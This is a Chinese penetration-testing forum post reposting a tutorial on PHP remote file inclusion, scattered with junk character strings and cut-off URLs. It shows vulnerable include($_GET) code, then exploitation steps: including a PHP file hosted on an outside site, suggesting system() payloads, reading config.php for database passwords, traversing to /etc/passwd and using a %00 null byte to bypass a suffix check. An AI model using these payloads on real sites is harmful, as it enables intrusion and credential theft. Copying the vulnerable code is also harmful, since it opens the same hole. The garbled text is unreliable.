中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含
7 ?. Y. N* w) v! X0 {/ d1 H; N
php远端档包含漏洞基本4 Q2 \% W* V% F  Q9 y: Q; W. V
这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。( e  B8 k% |6 i' U: W9 d7 z  ?7 Z
本帖隐藏的内容需要回复才可以浏览
( b/ f8 l2 q" j& e9 v首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
: ^& s+ E9 S) k6 N0 x: u, c2 i8 R1.找出bug:
. _: X  J3 r7 c" C5 V为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
+ ]5 y0 V1 `' {* d0 h如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。* m6 Q. k. J4 F" R
我们先看这个,当用户输入通过后就包含档,也就是
- V, t9 U* o' b6 L8 o1 N1 vif ($_GET) {  G! a4 m- r3 L
include $_GET;
5 ~; H5 r( x0 J4 q0 G} else {
2 r, L7 ]+ O+ t+ g& Q5 K" A) u7 Ginclude "home.php";( |4 ~/ L& I! D& t+ Z) ^
}
/ R' y- U5 P! T/ u这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。& Q- m+ l: o. l' f
2.测试
9 F" S4 B- p0 ]7 v1 |. e! R6 t8 a/ d这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的4 S# J8 |6 \4 @$ p+ e# u3 q
http://www.target.com/explame.php?page=zizzy
* z2 G5 `" s  h/ kWarning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3' b9 ]! B2 r/ M
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 32 W. S# b/ ^8 O+ C6 B
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。5 r( g# ~# y  q8 X" p4 u
3.利用$ Y% X9 J9 O, c& Y+ g' y7 X
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样% ]1 e$ Z* I1 V4 q
<?
3 j* B+ w- N1 U  v( W) Oecho "Wow,test!";" u( k4 e& C) L1 N1 [' m
?>
0 \2 [- H3 o* c那么http://www.target.com/explame.php?pa...e.com/yeah.txt' \- q" q1 M+ R3 A4 ^/ `; Z- W* G
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。- `6 f! O" `1 }
4.另一种
7 o' k! J1 i8 D! L有时程式师换种写法,写成这样,限制了包含范围! @  W! q/ `7 a0 k
if ($_GET) {# V* G& L) N$ U' |( l
include "$_GET.php";; Y2 u+ j$ h, U. J: h' S
} else {
) g/ B2 M, L, b- P4 J" g8 d4 _include "home.php";" j8 y5 U( B) o- @6 O  B
}" ^- M' B. D7 n# n2 |6 k& X7 F
我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt3 O/ i( r  K  k5 y' M# r8 ?
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3* Z' V# n0 l! m
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
2 u8 [. m9 t- v! C$ I包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
7 Q0 X1 \7 u; B* Y那passwd怎么办$ q/ G) I: F0 [& ~
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
1 l' i5 c' C8 ?. n' _7 |, T' K3 }Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
9 J! L$ M0 T+ \% J& O/ k在这里使用个NUL字元,也就是%00来跳过检测
/ ]# Z% Q+ N! f0 ~: x6 shttp://www.target.com/explame.php?pa.../etc/passwd%00
$ u$ @) v7 h! s9 M- B- M& K



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2